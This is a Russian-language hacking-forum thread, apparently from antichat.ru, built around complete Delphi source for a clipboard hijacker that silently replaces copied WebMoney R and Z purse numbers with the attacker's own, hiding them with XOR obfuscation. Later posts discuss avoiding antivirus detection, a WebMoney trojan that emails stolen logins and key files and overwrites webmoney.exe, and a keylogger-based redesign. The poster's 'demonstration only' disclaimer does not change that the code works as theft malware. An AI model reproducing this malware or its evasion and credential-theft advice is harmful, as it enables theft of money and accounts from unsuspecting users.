Wm шалость

Написал небольшую программку. Суть такова: висит себе тихонько на компе жертвы, при копировании в буфер обмена номера R или Z кошелька (ИМХО самый распространенный метод ввода кошелей в кипер) заменяет их на заранее заготовленные номерки. В итоге жертва вставляет не скопированный, а Ваш номер кошеля
В программе для демонстрации вшиты кошельки

R123456789101
Z123456789101

(придумал наобум)

скачать

Пароль: antichat.ru

Если понравится, выложу исходники (Писал на Delphi + KOL).

Хочу предупредить, что программа написана в целях демонстрации опасности данного метода обмана пользователя, а не, собственно, обмана

 

Сорцы скинь..

 

Стоит вопрос ты туда больше не чего не впарил?

 

Не впарил. А вот беда паблика в том, что первым делом все попадает на вирустотал => в базы антивиров. Вы что, вообще не доверяете антивиру, который стоит на Вашей машине?

 

Такое уже было.
ЗЫ. Перенесено в С/С++/Дельфи/Асм

 

Посчитал, что закрывать все-таки не стоит =)

 

=) Гы, спс! Исходник программы:

Code:

program wmb;

uses
  Windows, KOL;

const
  wmr = '\?<=:;8967?>?'; // hidestring('R123456789101', 14)
  wmz = 'G,/.)(+*%$,-,'; // hidestring('Z123456789101', 29)

type
  Twm = (Unknown, R, Z);

var
  Timer: PTimer;
  Mes: msg;

function hidestring(s: string; code: integer): string;
var
  t: Integer;
begin
  for t:=1 to Length(S) do S[t]:=Chr(Ord(S[t]) xor Code);
    Result:=S;
end;

function getwmtype(s: string): Twm;
var
  c: char;
  e: integer;
  i: int64;
begin
  result := Unknown;
  c := upcase(s[1]);
  if (length(s) <> 13) and (c <> chr($52)) and (c <> chr($5a)) then
    exit;
  if c = chr($52) then
    result := R
  else
    result := Z;
  delete(s,1,1);
  val(s,i,e);
  if e <> 0 then
    result := Unknown;
end;

procedure OnTimer(Sender: PControl);
var
  s: string;
begin
  if getwmtype(Clipboard2Text) = R then
    Text2Clipboard(hidestring(wmr, 14))
  else
    if getwmtype(Clipboard2Text) = Z then
      Text2Clipboard(hidestring(wmz, 29));
end;

begin
  Timer := NewTimer(200);
  Timer.OnTimer := TOnEvent(MakeMethod(nil,@OnTimer));
  Timer.Enabled := true;
   while (GetMessage(Mes, 0, 0, 0)) do
     begin
       TranslateMessage(Mes);
       DispatchMessage(Mes);
     end;
end.

Хоть, как сказал _Great_, такое уже было (я видать в то время под стол ходил), думаю, не все знают о данной фишке. Попасться реально легко (не считая сложностей впаривания), будьте внимательны

 

Joker-jar > можно и на чистый WinAPI переделать (see SetTimer).

 

я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.

 

А я про что ))) Так что эти трояны так побаловатся.... к примеру на друзьями )))

 

http://forum.antichat.ru/thread40090.html -- тут тоже самое только на C

 

ога...а потом блэки с логами...
-"Я перевел тебе деньги!"
-"Я ничего не получал...Все пишу блэк..."
З.Ы.:с подменой кошелей в буфере не писал трои только ленивый...^_^

 

У меня 2 таких троя на делпхи на визуалбайсик. 1-здесь нет остальных кошельков U,B,E.
2-Она некопируеца в системные папки и незалезает в авто запуск и непрячется от Alt+Ctrl+Del. Так что это трой безпозлезно распространять. Он тока на один раз запуска троя.Все трои с заменой кошелей старые им уж года 3 как я помню.

 

Радует то, что большинство знают о данной шалости. Если есть подозрения на то, что комп спидозный, обязательно смотрите что копируете, а что вставляете (одного раза может вполне хватить).

З.Ы. Согласен, что прога не годится для практических действий, но я этого и не добивался =)

 

2 vii долбаеп зачем на тотал то сувать?

 

Во первых зря ты оскорбил человека.
Это его личное дело , что , где и как проверять.

Во вторых , автор выложил исходники , кому нужно подправят и перекомпилят.

В третьих , лучше будет продаваться твой безпалевный криптор.

В четвертых , не нравятся антивирусы и фаерволы, отсылай на проверку их системные файлы, пуст палят друг друга.

 

Народ хотел спросить совета. Я написал wm троя на делфи с оригинальным дизайном самой webmoney тока при вводе wmid и паса все приходит мне на мыло и ключи kwm и пасс кнему тоже на мыло сливается. При запуске автоматическии заменяет оргинал в webmoney.exe на троян. и тд. Но есть одно но, файл трояна весит 244кб в зжатом состоянии сжимал Upack. Как зделать размер поменьше чтоб на лоадер можно было ставить?. Можно ли готовый проэкт переделать в KOL. Кто знает как все это замутить.

 

2 X-zone Ты попробуй сделать чуть по другому.
Пусть твой троян будет очень маленький. и его функции быдут такими:
1) стырит ключь
2) запустит реальный WM и поставит на него ловушку для клавы
3) стырит пас.
4) отошлет все на мыло.

Тем самым размер - мининум. и работоспособность не теряется

 

slesh, а разве в WM кипере нету антихука?

 

Я в курсе про этот алгоритм работы это будет следующая моя прога.Но дело в том чтоя хочу оптимизировать этот проект который зделал невыкидвать же его тока изза больщого размера.Пока его некто непалит вот что хорошо.